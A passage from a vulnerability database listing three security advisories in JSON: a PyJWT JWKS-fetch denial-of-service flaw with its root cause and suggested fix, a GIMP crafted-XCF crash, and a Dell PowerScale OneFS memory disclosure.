"CWE-460",
"CWE-755"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-15T17:28:46Z",
"nvd_published_at": "2026-05-28T16:16:29Z",
"severity": "LOW"
},
"details": "\u003e [!NOTE]\n\u003e The vulnerability surfaces only when a JWKS fetch fails; an attacker can attempt to provoke that with sustained unknown-kid traffic, but the outcome depends on upstream JWKS-endpoint behavior (rate limiting, transient errors) which is beyond the attacker\u0027s control. Impact is reduced auth availability until the next successful fetch, not complete denial of service.\n\n## Summary\nPyJWKClient.get_signing_key() forces a fresh HTTP request to the JWKS endpoint for every JWT with an unknown kid value, with no rate limiting. Since kid comes from the unverified token header, an attacker can trigger unlimited outbound requests.\n\nAdditionally, fetch_data() finally block clears the JWKS cache on network error.\n\n## Root Cause\njwt/jwks_client.py:172-198 - get_signing_key(kid) calls get_signing_keys(refresh=True) for unknown kids, bypassing TTL cache with no cooldown.\njwt/jwks_client.py:120-122 - finally block writes None to cache on error, clearing valid data.\n\n## Impact\n- DoS against JWKS endpoint (unlimited requests per invalid token)\n- DoS against application (network I/O latency)\n- Cascading failure (rate limiting clears cache, breaking legitimate auth)\n\n## Suggested Fix\n1. Add refresh cooldown (refuse refresh more than once per TTL period)\n2. Move cache write from finally to else block\n\n## Affected Versions\nAll versions with PyJWKClient (2.4.0 through 2.12.1)",
"id": "GHSA-fhv5-28vv-h8m8",
"modified": "2026-06-15T17:28:46Z",
"published": "2026-06-15T17:28:46Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48524"
},
{
"type": "PACKAGE",
"url": "https://github.com/jpadilla/pyjwt"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyjwt/PYSEC-2026-177.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "PyJWKClient unbounded JWKS endpoint requests via attacker-controlled kid values (DoS)"
}
GHSA-FJ77-3FG4-77VH
Vulnerability from github – Published: 2022-06-25 00:00 – Updated: 2022-07-02 00:00An issue in gimp_layer_invalidate_boundary of GNOME GIMP 2.10.30 allows attackers to trigger an unhandled exception via a crafted XCF file, causing a Denial of Service (DoS).
{
"affected": [],
"aliases": [
"CVE-2022-32990"
],
"database_specific": {
"cwe_ids": [
"CWE-755"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-06-24T14:15:00Z",
"severity": "MODERATE"
},
"details": "An issue in gimp_layer_invalidate_boundary of GNOME GIMP 2.10.30 allows attackers to trigger an unhandled exception via a crafted XCF file, causing a Denial of Service (DoS).",
"id": "GHSA-fj77-3fg4-77vh",
"modified": "2022-07-02T00:00:22Z",
"published": "2022-06-25T00:00:54Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-32990"
},
{
"type": "WEB",
"url": "https://gitlab.gnome.org/GNOME/gimp/-/issues/8230"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FJ83-G2VH-2826
Vulnerability from github – Published: 2022-05-24 19:11 – Updated: 2022-05-24 19:11Dell EMC PowerScale OneFS versions 8.2.x - 9.1.0.x contain a use of uninitialized resource vulnerability. This can potentially allow an authenticated user with ISI_PRIV_LOGIN_CONSOLE or ISI_PRIV_LOGIN_SSH privileges to gain access up to 24 bytes of data within the /ifs kernel stack under certain conditions.
{
"affected": [],
"aliases": [
"CVE-2021-36282"
],
"database_specific": {
"cwe_ids": [
"CWE-755",
"CWE-908"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-08-16T22:15:00Z",
"severity": "LOW"
},
"details": "Dell EMC PowerScale OneFS versions 8.2.x - 9.1.0.x contain a use of uninitialized resource vulnerability. This can potentially allow an authenticated user with ISI_PRIV_LOGIN_CONSOLE or ISI_PRIV_LOGIN_SSH privileges to gain access up to 24 bytes of data within the /ifs kernel stack under certain conditions.",
"id": "GHSA-fj83-g2vh-2826",
"modified": "2022-05-24T19:11:27Z",
"published": "2022-05-24T19:11:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-36282"
},
{
"type": "WEB",
"url": "https://www.dell.com/support/kbdoc/000190408"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
No mitigation information available for this CWE.
No CAPEC attack patterns related to this CWE.